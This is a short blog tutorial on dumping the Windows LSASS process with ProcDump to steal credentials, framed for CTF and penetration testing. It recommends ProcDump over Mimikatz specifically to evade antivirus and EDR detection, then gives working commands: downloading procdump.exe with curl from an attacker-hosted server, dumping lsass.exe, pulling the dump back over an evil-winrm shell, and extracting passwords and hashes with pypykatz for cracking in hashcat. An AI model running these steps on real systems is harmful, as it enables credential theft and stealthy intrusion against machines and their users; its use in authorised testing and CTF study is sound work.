Post

How to dump LSASS with ProcDump

This article is for educational purposes only! I do not encourage you to run this to a machine you do not have permission to run. Performing these actions without permission can lead to prosecution by the courts. I am not responsible for your actions!

In this short article, I will guide you to the steps you can perform to dump the LSASS process on a machine running Microsoft Windows. Without further redue, let’s get jump into it.

Overview

If you are working on a CTF or you are assigned to perform a pentest on a machine, you can come in the situation that you have to dump the LSASS process. You can use the well-known tool Mimikatz for this purpose. Mimikatz has only one big problem, it’s recognized by 57 / 70 antivirus products on VirusTotal, so using Mimikatz is not a wise choice for most environments. You have a high chance that you’re being noticed by the antivirus and so you will reveal to the blue teamers that you are in the network.

To avoid detection, you can use a LOLBAS (Living On the Land Binary Or Script) approach, by using ProcDump, instead of Mimikatz. ProcDump is recognized by 1 / 68 antivirus products on VirusTotal.

Even when you are using ProcDump you have to watch out. Some companies have deployed an EDR (Endpoint Detection and Response) solution on their systems. Most EDR solutions will generate a Medium alert when ProcDump is being used to dump a process, especially when the LSASS process is involved.

ProcDump

ProcDump is part of the Windows SysInternals, the main purpose of this command-line utility is to troubleshoot CPU spikes and generating crash dumps during a spike, so that an administrator or developer can determine the cause of the spike. But, it can also generate a dump of a process. And, especially the last functionality is useful in our scenario.

Dumping LSASS

In this example, I have broken into a system and I want to dump the LSASS. I have already a shell on the machine through Windows Remote Management (WinRM) with evil-winrm.

On the victim machine, we have downloaded procdump.exe to the C:\temp directory. I have hosted a HTTP server on my attacker machine, to download the binary.

1
curl 10.10.14.13/procdump.exe -o procdump.exe 

Now, we can dump the lsass.exe proces.

1
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp

Ok, we have now the lsass.dmp file which contains juicy information. We need to transfer this file to our attacker machine to analyze the contents.

1
download lsass.dmp

Extracting lsass.dmp

To analyze the contents we are using Pypykatz. Pypykatz is the Python implementation of Mimikatz. If you not have pypykatz installed, you can install it by running this command below.

1
git clone https://github.com/skelsec/pypykatz.git

Now run Pypykatz and call the lsass.dmp file.

1
pypykatz lsa minidump lsass.dmp

You have now extracted the lsass.dmp file which can contains plain text passwords. You can try to decrypt the LM hash and NT hash with hashcat.

Happy hacking! 🙂

This post is licensed under CC BY 4.0 by the author.